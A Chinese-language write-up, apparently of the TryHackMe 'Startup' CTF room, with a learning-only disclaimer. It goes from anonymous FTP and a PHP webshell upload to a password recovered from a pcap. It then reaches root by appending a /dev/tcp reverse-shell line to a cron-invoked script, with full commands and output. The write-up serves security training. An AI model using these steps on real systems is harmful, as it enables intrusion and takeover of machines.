关于安全:TryhackmeStartupwireshark数据报分析cron任务提权

42次阅读

共计 5583 个字符,预计需要花费 14 分钟才能阅读完成。

免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。

服务扫描

root💀kali)-[~]
└─# nmap -sV -Pn 10.10.171.61                           
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-11-06 02:51 EDT
Nmap scan report for 10.10.171.61
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.61 seconds

开启了 ftp,ssh,http 服务

匿名登录 ftp

┌──(root💀kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 ..
-rw-r--r--    1 0        0               5 Nov 12  2020 .test.log
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.

所有文件下载到本地剖析,ftp 文件夹外面没有任何货色,然而这个文件夹是可写的。

notice.txt内容

┌──(root💀kali)-[~/tryhackme/Startup]
└─# cat notice.txt 
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

maya 可能是个 ssh 用户名?

important.jpg显示两行文字

Everybody asks who's the impostor
but nobody asks how's the impostor

没看明确有啥有用的信息。

浸透 80 端口

关上 80 服务看看,显示一段话:


No spice here!

Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!

— Dev Team

网页源代码里有一行正文:

when are we gonna update this??

目录爆破看看

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.171.61                                                                                   
  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)                                                                     
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.171.61/_21-11-06_03-07-44.txt

Error Log: /root/dirsearch/logs/errors-21-11-06_03-07-44.log

Target: http://10.10.171.61/

[03:07:45] Starting:  
[03:08:41] 301 -  312B  - /files  ->  http://10.10.171.61/files/            
[03:08:42] 200 -    1KB - /files/                                           
[03:08:47] 200 -  808B  - /index.html                                       

存在一个 files 文件夹,文件目录显示和 ftp 上是一样的。那浸透思路就很简略,间接 ftp 上传 webshell 到服务器,在 web 上拜访触犯反弹 shell, 方才咱们曾经晓得,ftp 文件夹是可写的

ftp 上传 webshell

┌──(root💀kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ftp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put /root/reverse-shell.php ./shell.php
local: /root/reverse-shell.php remote: ./shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
3460 bytes sent in 0.00 secs (28.6932 MB/s)

触发反弹,拿到 webshell

┌──(root💀kali)-[~/tryhackme/Startup]
└─# nc -lnvp 1234                                       
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 46938
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 07:14:50 up 24 min,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

根目录找到一个文件recipe.txt

www-data@startup:/$ cat recipe.txt 
cat recipe.txt 
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

What is the secret spicy soup recipe?

love

横向提权到 lennie

查看 home 目录,发现存在一个用户:lennie,然而咱们没有查看文件夹的权限
查看/etc/passwd/,发现另一个用户:vagrant

根目录还有一个文件夹incidents,所有者是www-data,外面有一个文件suspicious.pcapng, 传回 kali 剖析

用 wirksharp 查看数据包,貌似是上一手黑客的网络交互信息
在第 177 个数据片留下了 lennie 的明码

c4ntg3t3n0ughsp1c3

拿到 user.txt

www-data@startup:/tmp$ su lennie
su lennie
Password: c4ntg3t3n0ughsp1c3

lennie@startup:/tmp$ cd /home
cd /home
lennie@startup:/home$ ls
ls
lennie
lennie@startup:/home$ cd lennie
cd lennie
lennie@startup:~$ ls
ls
Documents  scripts  user.txt

提权到 root

咱们查看 scripts 文件夹以及外面的脚本

lennie@startup:~$ cd scripts
cd scripts
lennie@startup:~/scripts$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root   root   4.0K Nov 12  2020 .
drwx------ 6 lennie lennie 4.0K Nov  6 08:43 ..
-rwxr-xr-x 1 root   root     77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root   root      1 Nov  6 08:57 startup_list.txt
lennie@startup:~/scripts$ cat planner.sh 
cat planner.sh 
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
lennie@startup:~/scripts$ ls -alh /etc/print.sh
ls -alh /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh

剖析

planner.sh 这个文件属于 root,按文件名来看属于某种定时工作,普通用户对于这个文件没有写权限。然而这个脚本调用了另一个脚本/etc/print.sh,这个脚本的属组是 lennie。也就是说咱们能够把反弹 shell 写进这个脚本

攻打

写脚本到/etc/print.sh

lennie@startup:~/scripts$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh
<cho "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh           
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
bash -i >& /dev/tcp/10.13.21.169/4242 0>&1

开启监听,等大概一分钟,拿到 root 权限

┌──(root💀kali)-[~/tryhackme/Startup]
└─# nc -lnvp 4242                                                                           
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 49342
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@startup:~# cat /root/root.txt
cat /root/root.txt

正文完
 0